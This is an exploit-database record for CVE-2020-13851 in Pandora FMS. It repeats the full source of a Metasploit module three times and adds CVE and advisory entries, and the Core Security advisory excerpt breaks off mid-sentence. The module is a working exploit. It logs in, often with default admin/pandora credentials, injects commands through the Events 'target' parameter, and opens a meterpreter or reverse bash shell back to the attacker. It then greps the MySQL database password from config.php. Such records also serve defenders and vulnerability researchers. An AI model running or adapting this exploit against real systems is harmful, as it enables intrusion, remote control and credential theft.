This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in th e Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).
{"id": "1337DAY-ID-34669", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Pandora FMS 7.0 NG 7XX Remote Command Execution Exploit", "description": "This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in th e Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).", "published": "2020-07-12T00:00:00", "modified": "2020-07-12T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/34669", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2020-13851"], "immutableFields": [], "lastseen": "2021-12-17T05:20:00", "viewCount": 161, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0517"]}, {"type": "coresecurity", "idList": ["CORE-2020-0010"]}, {"type": "cve", "idList": ["CVE-2020-13851"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-PANDORA_FMS_EVENTS_EXEC-"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158390"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0517"]}, {"type": "cve", "idList": ["CVE-2020-13851"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HTTPDX_TOLOG_FORMAT"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158390"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/34669", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pandora FMS Events Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability (CVE-2020-13851) in Pandora\n FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps\n older versions) in order to execute arbitrary commands.\n\n This module takes advantage of a command injection vulnerability in the\n `Events` feature of Pandora FMS. This flaw allows users to execute\n arbitrary commands via the `target` parameter in HTTP POST requests to\n the `Events` function. After authenticating to the target, the module\n attempts to exploit this flaw by issuing such an HTTP POST request,\n with the `target` parameter set to contain the payload. If a shell is\n obtained, the module will try to obtain the local MySQL database\n password via a simple `grep` command on the plaintext\n `/var/www/html/pandora_console/include/config.php` file.\n\n Valid credentials for a Pandora FMS account are required. The account\n does not need to have admin privileges.\n This module has been successfully tested on Pandora 7.0 NG 744 running\n on CentOS 7 (the official virtual appliance ISO for this version).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Fernando Catoira', # Discovery\n 'Julio Sanchez', # Discovery\n 'Erik Wynter' # @wyntererik - Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2020-13851'], # RCE via the `events` feature\n ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']\n ],\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],\n 'Targets' =>\n [\n [\n 'Linux (x86)', {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-06-04',\n 'DefaultTarget' => 1\n )\n )\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),\n OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])\n ]\n end\n\n def check\n vprint_status('Running check')\n res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')\n\n unless res\n return CheckCode::Unknown('Connection failed.')\n end\n\n unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')\n return CheckCode::Safe('Target is not a Pandora FMS application.')\n end\n\n @cookie = res.get_cookies\n html = res.get_html_document\n full_version = html.at('div[@id=\"ver_num\"]')\n\n if full_version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n full_version = full_version.text\n\n version = full_version[1..-1].sub('NG', '')\n\n if version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n version = Gem::Version.new version\n\n unless version <= Gem::Version.new('7.0.744')\n return CheckCode::Safe(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n CheckCode::Appears(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n def login(user, pass)\n vprint_status \"Authenticating as #{user} ...\"\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => @cookie,\n 'vars_get' => { 'login' => '1' },\n 'vars_post' => {\n 'nick' => user,\n 'pass' => pass,\n 'login_button' => 'Login'\n }\n })\n\n unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')\n fail_with Failure::NoAccess, 'Authentication failed'\n end\n\n print_good \"Authenticated as user #{user}.\"\n end\n\n def on_new_session(client)\n super\n if target.arch.first == ARCH_CMD\n print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')\n client.shell_write(\"grep dbpass include/config.php\\n\")\n else\n print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status('Executing payload...')\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax.php'),\n 'cookie' => @cookie,\n 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Referer' => full_uri('index.php'),\n 'vars_get' => {\n 'sec' => 'eventos',\n 'sec2' => 'operation/events/events'\n },\n 'vars_post' => {\n 'page' => 'include/ajax/events',\n 'perform_event_response' => '10000000',\n 'target' => cmd.to_s,\n 'response_id' => '1'\n }\n }, 0) # the server will not send a response, so the module shouldn't wait for one\n end\n\n def exploit\n login(datastore['USERNAME'], datastore['PASSWORD'])\n\n if target.arch.first == ARCH_CMD\n execute_command payload.encoded\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1660004461, "score": 1660009287}, "_internal": {"score_hash": "9ab77426b7635b8d19720e242eda4d0e"}}
{"metasploit": [{"lastseen": "2022-06-24T08:39:13", "description": "This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `Events` feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the `target` parameter in HTTP POST requests to the `Events` function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the `target` parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple `grep` command on the plaintext `/var/www/html/pandora_console/include/config.php` file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T20:21:12", "type": "metasploit", "title": "Pandora FMS Events Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13851"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-LINUX-HTTP-PANDORA_FMS_EVENTS_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/pandora_fms_events_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pandora FMS Events Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability (CVE-2020-13851) in Pandora\n FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps\n older versions) in order to execute arbitrary commands.\n\n This module takes advantage of a command injection vulnerability in the\n `Events` feature of Pandora FMS. This flaw allows users to execute\n arbitrary commands via the `target` parameter in HTTP POST requests to\n the `Events` function. After authenticating to the target, the module\n attempts to exploit this flaw by issuing such an HTTP POST request,\n with the `target` parameter set to contain the payload. If a shell is\n obtained, the module will try to obtain the local MySQL database\n password via a simple `grep` command on the plaintext\n `/var/www/html/pandora_console/include/config.php` file.\n\n Valid credentials for a Pandora FMS account are required. The account\n does not need to have admin privileges.\n This module has been successfully tested on Pandora 7.0 NG 744 running\n on CentOS 7 (the official virtual appliance ISO for this version).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Fernando Catoira', # Discovery\n 'Julio Sanchez', # Discovery\n 'Erik Wynter' # @wyntererik - Metasploit\n ],\n 'References' => [\n ['CVE', '2020-13851'], # RCE via the `events` feature\n ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']\n ],\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],\n 'Targets' => [\n [\n 'Linux (x86)', {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-06-04',\n 'DefaultTarget' => 1\n )\n )\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),\n OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])\n ]\n end\n\n def check\n vprint_status('Running check')\n res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')\n\n unless res\n return CheckCode::Unknown('Connection failed.')\n end\n\n unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')\n return CheckCode::Safe('Target is not a Pandora FMS application.')\n end\n\n @cookie = res.get_cookies\n html = res.get_html_document\n full_version = html.at('div[@id=\"ver_num\"]')\n\n if full_version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n full_version = full_version.text\n\n version = full_version[1..-1].sub('NG', '')\n\n if version.blank?\n return CheckCode::Detected('Could not determine the Pandora FMS version.')\n end\n\n version = Rex::Version.new version\n\n unless version <= Rex::Version.new('7.0.744')\n return CheckCode::Safe(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n CheckCode::Appears(\"Target is Pandora FMS version #{full_version}.\")\n end\n\n def login(user, pass)\n vprint_status \"Authenticating as #{user} ...\"\n\n res = send_request_cgi!({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => @cookie,\n 'vars_get' => { 'login' => '1' },\n 'vars_post' => {\n 'nick' => user,\n 'pass' => pass,\n 'login_button' => 'Login'\n }\n })\n\n unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')\n fail_with Failure::NoAccess, 'Authentication failed'\n end\n\n print_good \"Authenticated as user #{user}.\"\n end\n\n def on_new_session(client)\n super\n if target.arch.first == ARCH_CMD\n print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')\n client.shell_write(\"grep dbpass include/config.php\\n\")\n else\n print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status('Executing payload...')\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ajax.php'),\n 'cookie' => @cookie,\n 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Referer' => full_uri('index.php'),\n 'vars_get' => {\n 'sec' => 'eventos',\n 'sec2' => 'operation/events/events'\n },\n 'vars_post' => {\n 'page' => 'include/ajax/events',\n 'perform_event_response' => '10000000',\n 'target' => cmd.to_s,\n 'response_id' => '1'\n }\n }, 0) # the server will not send a response, so the module shouldn't wait for one\n end\n\n def exploit\n login(datastore['USERNAME'], datastore['PASSWORD'])\n\n if target.arch.first == ARCH_CMD\n execute_command payload.encoded\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/pandora_fms_events_exec.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-07-12T17:17:46", "description": "", "cvss3": {}, "published": "2020-07-11T00:00:00", "type": "packetstorm", "title": "Pandora FMS 7.0 NG 7XX Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-13851"], "modified": "2020-07-11T00:00:00", "id": "PACKETSTORM:158390", "href": "https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pandora FMS Events Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability (CVE-2020-13851) in Pandora \nFMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps \nolder versions) in order to execute arbitrary commands. \n \nThis module takes advantage of a command injection vulnerability in the \n`Events` feature of Pandora FMS. This flaw allows users to execute \narbitrary commands via the `target` parameter in HTTP POST requests to \nthe `Events` function. After authenticating to the target, the module \nattempts to exploit this flaw by issuing such an HTTP POST request, \nwith the `target` parameter set to contain the payload. If a shell is \nobtained, the module will try to obtain the local MySQL database \npassword via a simple `grep` command on the plaintext \n`/var/www/html/pandora_console/include/config.php` file. \n \nValid credentials for a Pandora FMS account are required. The account \ndoes not need to have admin privileges. \nThis module has been successfully tested on Pandora 7.0 NG 744 running \non CentOS 7 (the official virtual appliance ISO for this version). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Fernando Catoira', # Discovery \n'Julio Sanchez', # Discovery \n'Erik Wynter' # @wyntererik - Metasploit \n], \n'References' => \n[ \n['CVE', '2020-13851'], # RCE via the `events` feature \n['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities'] \n], \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD], \n'Targets' => \n[ \n[ \n'Linux (x86)', { \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux (x64)', { \n'Arch' => ARCH_X64, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux (cmd)', { \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => '2020-06-04', \n'DefaultTarget' => 1 \n) \n) \nregister_options [ \nOptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']), \nOptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), \nOptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora']) \n] \nend \n \ndef check \nvprint_status('Running check') \nres = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php') \n \nunless res \nreturn CheckCode::Unknown('Connection failed.') \nend \n \nunless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>') \nreturn CheckCode::Safe('Target is not a Pandora FMS application.') \nend \n \n@cookie = res.get_cookies \nhtml = res.get_html_document \nfull_version = html.at('div[@id=\"ver_num\"]') \n \nif full_version.blank? \nreturn CheckCode::Detected('Could not determine the Pandora FMS version.') \nend \n \nfull_version = full_version.text \n \nversion = full_version[1..-1].sub('NG', '') \n \nif version.blank? \nreturn CheckCode::Detected('Could not determine the Pandora FMS version.') \nend \n \nversion = Gem::Version.new version \n \nunless version <= Gem::Version.new('7.0.744') \nreturn CheckCode::Safe(\"Target is Pandora FMS version #{full_version}.\") \nend \n \nCheckCode::Appears(\"Target is Pandora FMS version #{full_version}.\") \nend \n \ndef login(user, pass) \nvprint_status \"Authenticating as #{user} ...\" \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'cookie' => @cookie, \n'vars_get' => { 'login' => '1' }, \n'vars_post' => { \n'nick' => user, \n'pass' => pass, \n'login_button' => 'Login' \n} \n}) \n \nunless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>') \nfail_with Failure::NoAccess, 'Authentication failed' \nend \n \nprint_good \"Authenticated as user #{user}.\" \nend \n \ndef on_new_session(client) \nsuper \nif target.arch.first == ARCH_CMD \nprint_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.') \nclient.shell_write(\"grep dbpass include/config.php\\n\") \nelse \nprint_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.') \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status('Executing payload...') \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'ajax.php'), \n'cookie' => @cookie, \n'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', \n'Referer' => full_uri('index.php'), \n'vars_get' => { \n'sec' => 'eventos', \n'sec2' => 'operation/events/events' \n}, \n'vars_post' => { \n'page' => 'include/ajax/events', \n'perform_event_response' => '10000000', \n'target' => cmd.to_s, \n'response_id' => '1' \n} \n}, 0) # the server will not send a response, so the module shouldn't wait for one \nend \n \ndef exploit \nlogin(datastore['USERNAME'], datastore['PASSWORD']) \n \nif target.arch.first == ARCH_CMD \nexecute_command payload.encoded \nelse \nexecute_cmdstager(background: true) \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158390/pandora_fms_events_exec.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-04-27T17:39:18", "description": "Artica Pandora FMS 7.44 allows remote command execution via the events feature.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-11T03:15:00", "type": "cve", "title": "CVE-2020-13851", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13851"], "modified": "2022-04-27T14:16:00", "cpe": ["cpe:/a:pandorafms:pandora_fms:7.44"], "id": "CVE-2020-13851", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13851", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:39:09", "description": "A remote code execution vulnerability exists in Pandora FMS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-20T00:00:00", "type": "checkpoint_advisories", "title": "Pandora FMS Remote Code Execution (CVE-2020-13851; CVE-2020-13852; CVE-2020-13855)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13851", "CVE-2020-13852", "CVE-2020-13855"], "modified": "2020-06-20T00:00:00", "id": "CPAI-2020-0517", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "coresecurity": [{"lastseen": "2022-08-12T02:15:14", "description": "## 1\\. Advisory Information\n\n**Title**: Pandora FMS Community Multiple Vulnerabilities \n**Advisory ID**: CORE-2020-0010 \n**Advisory URL**: www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities \n**Date published**: 2020-06-09 \n**Date of last update**: 2020-06-09 \n**Vendors contacted:** [\u00c1rtica ST](<https://pandorafms.org/>) \\- Pandora FMS development team \n**Release mode:** Coordinated release\n\n## 2\\. Vulnerability Information\n\n**Class**: Unrestricted Upload of File with Dangerous Type [[CWE-434](<https://cwe.mitre.org/data/definitions/434.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)], Improper Access Control [[CWE-284](<https://cwe.mitre.org/data/definitions/284.html>)], Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) [[CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)]\n\n**Impact:** Code execution, Privilege Escalation \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **Yes \n**CVE Name: **[CVE-2020-13850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13850>), [CVE-2020-13851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13851>), [CVE-2020-13852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13852>), [CVE-2020-13853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13853>), [CVE-2020-13854](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13854>), [CVE-2020-13855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13855>)\n\n## 3\\. Vulnerability Description\n\n[\u00c1rtica ST](<https://pandorafms.org/>)[1] is a Spanish based software company focused on cybersecurity and systems management. \u00c1rtica ST created, develops, and distributes Pandora FMS, a monitoring solution for IT environments. Pandora FMS provides visual monitoring of the status of networks, servers, applications, and other parts of an organization\u2019s infrastructure. Both an open source version and enterprise edition are available. \n\nMultiple vulnerabilities were found in the Virtual Appliance and Docker versions, which would allow a remote authenticated attacker to upload arbitrary files. This could lead to the execution of arbitrary commands with root privileges.\n\n## 4\\. Vulnerable Packages\n\n * Pandora FMS 7.0 NG 743 and 742 Virtual Appliance ISO\n * Pandora FMS 7.0 NG 744 Docker version\n * Pandora FMS 7.0 NG 744 Virtual Appliance ISO. (In this version, the service must be enabled first by the administrator in the console shell in order to exploit the vulnerability described in 7.4.)\n\nOther products and [versions](<https://pandorafms.com/downloads/whats-new-745-EN.pdf>)[2] might be affected, but have not yet been tested.\n\n## 5\\. Vendor Information, Solutions, and Workarounds\n\n\u00c1rtica ST has released version [746](<https://pandorafms.com/downloads/whats-new-746-EN.pdf>)[3], which fixes the reported issues.\n\n## 6\\. Credits\n\nThis vulnerability was discovered and researched by** ****Fernando Catoira** and **Julio Sanchez** from Core Security Consulting Services.\n\nThe publication of this advisory was coordinated by **Pablo A. Zurro** from the CoreLabs Advisories Team.\n\n## 7\\. Technical Description / Proof of Concept Code\n\n### 7.1 Remote Command Execution Via the Events Feature\n\n[[CVE-2020-13851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13851>)] It is possible to abuse the `Events` feature to gain arbitrary command execution on the underlying operating system. The `Events` function allows a user to configure and execute actions (server responses) based on specific conditions reported by the agents. For instance, it is possible to leverage the mentioned feature to execute an arbitrary operating system command as the user `apache` in the context of the Pandora FMS server. It should be noted that low privilege (i.e. non-administrative users) can issue the following request as well.\n\nThe following proof of concept shows how it is possible to obtain a reverse 